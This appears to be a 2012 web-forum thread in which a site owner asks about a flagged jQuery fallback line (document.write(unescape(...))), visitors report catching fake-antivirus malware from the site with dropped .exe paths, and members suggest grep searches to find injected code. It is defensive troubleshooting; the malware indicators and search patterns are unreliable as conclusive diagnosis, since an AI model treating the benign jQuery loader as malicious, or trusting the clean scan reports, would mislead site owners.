Suspicious Inline Obfuscated script

XHIBIT911 · June 26, 2012, 02:52:11 PM

I did a scan of my website and this line of code was listed as suspicious...what the hell is this about ?

Code Select

!window.jQuery && document.write(unescape('%3Cscript src="http://code.jquery.com/jquery.min.js"%3E%...

Sir Osis of Liver · June 26, 2012, 02:59:51 PM

Could be this -

https://www.owasp.org/index.php/Testing_for_Cross_site_scripting

Storman™ · June 26, 2012, 03:02:26 PM

QuoteI did a scan of my website....

How ? What method do you mean ? Looks iffy though.....

Storman™ · June 26, 2012, 03:05:27 PM

QuoteHow ? What method do you mean ? Looks iffy though.....

Ooops, don't worry I just checked pshomesource and my Avast went into mayhem mode.

Yep looks like you have an issue...

XHIBIT911 · June 26, 2012, 03:07:56 PM

--------- LINK SCAN SUMMARY ---------
URL scanned: http://www.pshomesource.com
PhisTank say's: This site is safe.
AVG say's: Service not available.
SiteTruth say's: This site is safe.
Google Safe Browsing say's: This site is safe.
Threat Name: No Threat FOUND
Threat Definitions: 1260009
Engine Version: 0.97.5
Host IP:
Link Status: Clean
File Size: 50.55 KB
Time Finished: 8.05 secs
Overall result: This site is secure.

XHIBIT911 · June 26, 2012, 03:08:44 PM

Scan Report
MyWOT   26-06-2012, 12:01:21   CLEAN   More Details
Netcraft   26-06-2012, 12:01:21   CLEAN   More Details
urlQuery   26-06-2012, 12:01:21   CLEAN   More Details
DrWeb   26-06-2012, 12:01:21   CLEAN   More Details
AMaDa   17-03-2012, 06:48:58   CLEAN   More Details
MalwareDomainList   26-06-2012, 12:00:34   CLEAN   More Details
malc0de   26-06-2012, 12:00:35   CLEAN   More Details
ZeuS Tracker   26-06-2012, 12:00:47   CLEAN   More Details
SpyEye Tracker   26-06-2012, 12:00:52   CLEAN   More Details
EXPOSURE   26-06-2012, 12:01:00   CLEAN   More Details
Malware Patrol    26-06-2012, 12:01:15   CLEAN   More Details
PhishTank   26-06-2012, 12:01:18   CLEAN   More Details
DNS-BH   26-06-2012, 12:01:20   CLEAN   More Details
JoeWein   26-06-2012, 12:00:10   CLEAN   More Details
BitDefender   26-06-2012, 12:01:21   CLEAN   More Details
VScan   26-06-2012, 12:01:21   CLEAN   More Details
Avira   26-06-2012, 12:01:21   CLEAN   More Details
SCUMWARE   26-06-2012, 12:01:21   CLEAN   More Details
URIBL   26-06-2012, 12:01:21   CLEAN   More Details
MalwareBlacklist   26-06-2012, 12:01:21   CLEAN   More Details
hpHosts   26-06-2012, 12:01:21   CLEAN   More Details
BrowserDefender   26-06-2012, 12:01:21   CLEAN   More Details
TrendMicro   26-06-2012, 12:01:21   CLEAN   More Details
GoogleSafeBrowsing   26-06-2012, 12:01:21   CLEAN   More Details
SpamhausDBL   26-06-2012, 12:01:21   CLEAN   More Details
SURBL   26-06-2012, 12:01:21   CLEAN   More Details
WebSecurityGuard   26-06-2012, 12:01:21   CLEAN   More Details
AVGThreatLabs   26-06-2012, 12:01:21   CLEAN   More Details
URLVir   26-06-2012, 12:01:21   CLEAN   More Details
ThreatLog   26-06-2012, 12:01:21   CLEAN   More Details
K7Antivirus   26-06-2012, 05:45:10   CLEAN   More Details

XHIBIT911 · June 26, 2012, 03:13:37 PM

Avast and AVG are either giving false positives or that script is malicious because I have 100 members who never had the issue, and every now and then someone messages me and says different.

After testing my site on various website checkers which all listed my site as being clean:
https://www.virustotal.com/#url

http://online.us.drweb.com/?url=1

http://onlinelinkscan.com/

http://www.urlvoid.com/scan/pshomesource.com/

http://jsunpack.jeek.org/dec/go?report=1a41bdf10d6d8a5cdafeb700c1e9af67c6f46a97

I get suspicious readings from here: http://www.unmaskparasites.com/security-report/#report

And avira's site as potential threats.

XHIBIT911 · June 26, 2012, 03:17:55 PM

Where do I find that code and is it safe to remove...because I have had people (very very few) say that it set their security suites off.

Fustrate · June 26, 2012, 03:23:27 PM

It's just a normal way to include jQuery (a javascript library). Nothing to worry about, since it's sourcing the script straight from jQuery's site.

XHIBIT911 · June 26, 2012, 03:36:01 PM

OK well how can I find and remove whatever exploit peoples security suites are claiming my site has ?

Storman™ · June 26, 2012, 03:51:37 PM

Well having gone to your site I can report that I've "caught" something.

Not your fault, this stuff happens, but I would take your links out of your sig till you get it sorted out.

Having greeat fun at the moment lol, popup heaven. Think I'm going to be busy for a while.... $:-\$

EDIT: Actually this is not fun, just lost restore points and boot loader fudged. Rebuilt boot loader but this is a mean little bugger. I can see a full re-install on the cards here

Fustrate · June 26, 2012, 04:34:03 PM

Quote from: XHIBIT911 on June 26, 2012, 03:36:01 PM
OK well how can I find and remove whatever exploit peoples security suites are claiming my site has ?

Well, it's certainly not that line that you posted. I don't see anything blatantly suspicious when I load the site, but that doesn't mean there's nothing there.

Storman™ · June 26, 2012, 04:38:11 PM

Well I just acquired some mean little barstool from the site so wouldn't advise going there unless it's sorted now ?

Fustrate · June 26, 2012, 04:56:23 PM

It could be something that only shows up once in a while or on specific systems. Instead of an online scan, can you do a scan from the server itself? Or, if you're on a shared host, can they do a scan?

busterone · June 26, 2012, 05:36:00 PM

I got the fake antivirus - "security scan" on my system when I checked out your site about 20 minutes ago. It blew right past Nod32. Luckily, I have a copy of rkill and killed the process before any damage was done. It placed itself in \Local Settings\Application Data\oppflgxxez.exe

My computer is clean now, but there is something wrong on your site, whether infected ads or base code, I can't say.

XHIBIT911 · June 26, 2012, 06:26:12 PM

Its got to be in some code somewhere because I dont do ads. Those are just image link banners that I uploaded myself and it was doing this before they were onsite....I need to find the code and get it the hell out but dont have a clue how to find it or where to even look

Storman™ · June 27, 2012, 05:44:58 AM

QuoteIt placed itself in \Local Settings\Application Data\oppflgxxez.exe

Well I'm up and running again after re-imaging, had what busterone had but it went one step further before I could intervene. Also had file in Application Data but differenet name:

Code Select

\Local Settings\Application Data\bgjaipqfa.exe

Remind me to run sandboxed next time, doh..

QuoteI need to find the code and get it the hell out but dont have a clue how to find it or where to even look

XHIBIT911 - Have you got root access to your server ? If so, do you know how to use a SSH client like Putty ?

SSH into server as root, if not already there change directory to root folder:

Code Select

cd /

then run grep to find a particular string in the server files:

Code Select

grep -R yourstring *

You'll need to replace the text "yourstring" with something that we are searching for. I would have thougt it unlikley that "document.write(unescape" is used anywhere legitimate so you could try that as a starter unless you have more code to go on. So you'll need to run:

Code Select

grep -R document.write(unescape *

If grep -R fails to work then try:

Code Select

find / -type f -exec grep -l document.write(unescape {} \;

Obviously you can try searching for different code, depends what you have to go on.

Please bear in mind that searching like that can put a strain on the CPU, depends on the set-up you're on. Just something to remember in case it falls over, but the least of your worrries in this situation.

Fustrate · June 27, 2012, 01:40:05 PM

Again, that particular line is not the problem. As I said before, it is used legitimately to load jQuery if it hasn't already been loaded.

You're leading XHIBIT911 on a wild goose chase. He should really be doing a scan with actual security software, not grepping for a string that has nothing to do with the malware.

I'll repeat: do a scan on the system itself or ask your host to.

Storman™ · June 27, 2012, 02:08:30 PM

QuoteYou're leading XHIBIT911 on a wild goose chase

It was the only line posted and I did say it depends on what other code he already has and to adjust accordingly.

I disagree though that the line is definitely not the problem, "document.write(unescape" is used in malware all the time so to discount it outright is not good practice until proved otherwise. It makes perfect sense to load jquery externally for something like this. As we have no idea what other code or mods are running on the site then you can't simply say it's legitimate, it's a dangerous assumption without further information being available to us.

Doing the above is just one of number of avenues he should be looking at, including as you quite rightly say a security scan, but again they could well turn up nothing depending on the nature of the cause.

News:

Suspicious Inline Obfuscated script